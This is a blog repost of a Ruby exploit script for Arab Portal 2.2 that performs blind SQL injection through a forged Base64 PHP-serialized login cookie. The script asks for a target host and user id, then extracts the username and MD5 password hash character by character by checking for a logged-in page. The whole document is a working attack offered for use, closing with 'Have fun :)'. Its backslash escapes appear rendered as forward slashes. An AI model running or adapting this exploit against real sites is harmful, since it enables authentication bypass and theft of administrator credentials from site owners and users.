Arab Portal 2.2 (Auth Bypass) Blind SQL Injection

最新推荐文章于 2024-10-14 17:36:50 发布

bsdhack

最新推荐文章于 2024-10-14 17:36:50 发布

阅读量843

点赞数

分类专栏：技术文献文章标签： sql login header authentication path website

本文链接：https://blog.csdn.net/bsdhack/article/details/4458116

版权

技术文献专栏收录该内容

5 篇文章 0 订阅

订阅专栏

#!/usr/bin/ruby

#=============================================#
#          Arab Portal v2.2 Exploit           #,
# Blind SQL Injection / Authentication Bypass #
# Discovered & written by: Jafer Al-Zidjali #
#         Email: jafer@scorpionds.com         #
#         Website: www.scorpionds.com         #
#=============================================#

require "net/http"
require "base64"

intro=[
          "+=============================================+",
          "+          Arab Portal v2.2 Exploit           +",
          "+ Blind SQL Injection / Authentication Bypass +",
          "+ Discovered & written by: Jafer Al-Zidjali +",
          "+         Email: jafer@scorpionds.com         +",
          "+         Website: www.scorpionds.com         +",
          "+=============================================+"
          ]

def print_intro text
w="|"
text.each do |str|
    str.scan(/./) do |c|
        STDOUT.flush
      if w=="|"
        print "/b"+c +w
        w="/"
      elsif w=="/"
        print "/b"+c +w
        w="-"
      elsif w=="-"
        print "/b"+c +w
        w="//"
      else
      print "/b"+c +w
      w="|"
      end
      sleep 0.05
    end
    print "/b "
    puts ""
end
end

print_intro intro

puts "/nEnter host name (e.g. example.com):"
host=gets.chomp

puts "/nEnter script path (e.g. /arabportal/):"
path=gets.chomp

puts "/nEnter userid:"
userid=gets.chomp

puts "/nGetting cookie value..."

http = Net::HTTP.new(host, 80)

resp= http.get(path)
cookie = resp.response["set-cookie"]

len=cookie.split("; ").length
max=0
login_info=""

len.times do |count|
clen=cookie.split("; ")[count].length
    if clen > max then
      max=clen
      login_info=cookie.split("; ")[count]
    end
end

login_info=login_info.split(", ")

if login_info[0].length > login_info[1].length
login_info=login_info[0]
else
login_info=login_info[1]
end

login_info=login_info.split("=")[0]

puts "Cookie name is: "+login_info

puts "/nWhat do you want to do?"
puts "1. Get username."
puts "2. Get password hash."

opt=gets.chomp

if opt=="1"
unamelen=0
print "/nGetting username length"

20.times do |x|
    stmt="#{userid}"+
                    "/x27/x20/x61/x6e/x64/x20/x6c"+
                    "/x65/x6e/x67/x74/x68/x28/x75"+
                    "/x73/x65/x72/x6e/x61/x6d/x65"+
                    "/x29/x3d#{x}/x20/x6f/x72/x20/x27/x27/x3d/x27"

    shellcode="/x61/x3a/x35/x3a/x7b/x69/x3a/x30"+
              "/x3b/x73/x3a/x31/x30/x3a/x22/x61"+
              "/x72/x61/x62/x70/x6f/x72/x74/x61"+
              "/x6c/x22/x3b/x69/x3a/x31/x3b/x69"+
              "/x3a/x31/x3b/x69/x3a/x32/x3b/x73/x3a"+
              stmt.length.to_s+
              "/x3a/x22"+
              stmt+
              "/x22/x3b/x69/x3a/x33/x3b/x69/x3a"+
              "/x30/x3b/x69/x3a/x34/x3b/x73/x3a"+
              "/x31/x3a/x22/x61/x22/x3b/x7d"

    header={
                  "Cookie" => login_info+"="+Base64.encode64(shellcode).gsub(//s/,"")
    }

    resp= http.get(path,header)
    if resp.body =~ /action=logout/
      puts "/nLength is: #{x}"
      unamelen=x
      break
    else
        print "."
        STDOUT.flush
    end
end

chars="abcdefghijklmnopqrstuvwxyz0123456789"

print "/nGetting username: "
unamelen.times do |z|
    chars.scan(/./) do |c|
        stmt="#{userid}"+
                        "/x27/x20/x61/x6e/x64/x20/x73"+
                        "/x75/x62/x73/x74/x72/x69/x6e"+
                        "/x67/x28/x75/x73/x65/x72/x6e"+
                        "/x61/x6d/x65/x2c#{z+1}/x2c/x31/x29/x3d/x27#{c}/x27/x20/x6f/x72/x20/x27/x27/x3d/x27"

        shellcode="/x61/x3a/x35/x3a/x7b/x69/x3a/x30"+
                  "/x3b/x73/x3a/x31/x30/x3a/x22/x61"+
                  "/x72/x61/x62/x70/x6f/x72/x74/x61"+
                  "/x6c/x22/x3b/x69/x3a/x31/x3b/x69"+
                  "/x3a/x31/x3b/x69/x3a/x32/x3b/x73/x3a"+
                  stmt.length.to_s+
                  "/x3a/x22"+
                  stmt+
                  "/x22/x3b/x69/x3a/x33/x3b/x69/x3a"+
                  "/x30/x3b/x69/x3a/x34/x3b/x73/x3a"+
                  "/x31/x3a/x22/x61/x22/x3b/x7d"

        header={
                      "Cookie" => login_info+"="+Base64.encode64(shellcode).gsub(//s/,"")
        }
        print c
        STDOUT.flush
        http = Net::HTTP.new(host, 80)
        resp= http.get(path,header)
        if resp.body =~ /action=logout/
          break
        end
        print "/b"
    end
end
puts "/nHave fun :)"

elsif opt=="2"
chars="0123456789abcdef"

print "/nGetting password hash: "
32.times do |z|
    chars.scan(/./) do |c|
        stmt="#{userid}"+
                        "/x27/x20/x61/x6e/x64/x20/x73/x75"+
                        "/x62/x73/x74/x72/x69/x6e/x67/x28"+
                        "/x70/x61/x73/x73/x77/x6f/x72/x64"+
                        "/x2c#{z+1}/x2c/x31/x29/x3d/x27#{c}/x27"+
                        "/x20/x6f/x72/x20/x27/x27/x3d/x27"
        shellcode="/x61/x3a/x35/x3a/x7b/x69/x3a/x30"+
                  "/x3b/x73/x3a/x31/x30/x3a/x22/x61"+
                  "/x72/x61/x62/x70/x6f/x72/x74/x61"+
                  "/x6c/x22/x3b/x69/x3a/x31/x3b/x69"+
                  "/x3a/x31/x3b/x69/x3a/x32/x3b/x73/x3a"+
                  stmt.length.to_s+
                  "/x3a/x22"+
                  stmt+
                  "/x22/x3b/x69/x3a/x33/x3b/x69/x3a"+
                  "/x30/x3b/x69/x3a/x34/x3b/x73/x3a"+
                  "/x31/x3a/x22/x61/x22/x3b/x7d"
        header={
                      "Cookie" => login_info+"="+Base64.encode64(shellcode).gsub(//s/,"")
        }
        print c
        STDOUT.flush
        http = Net::HTTP.new(host, 80)
        resp= http.get(path,header)
        if resp.body =~ /action=logout/
          break
        end
        print "/b"
    end
end
puts "/nHave fun :)"
end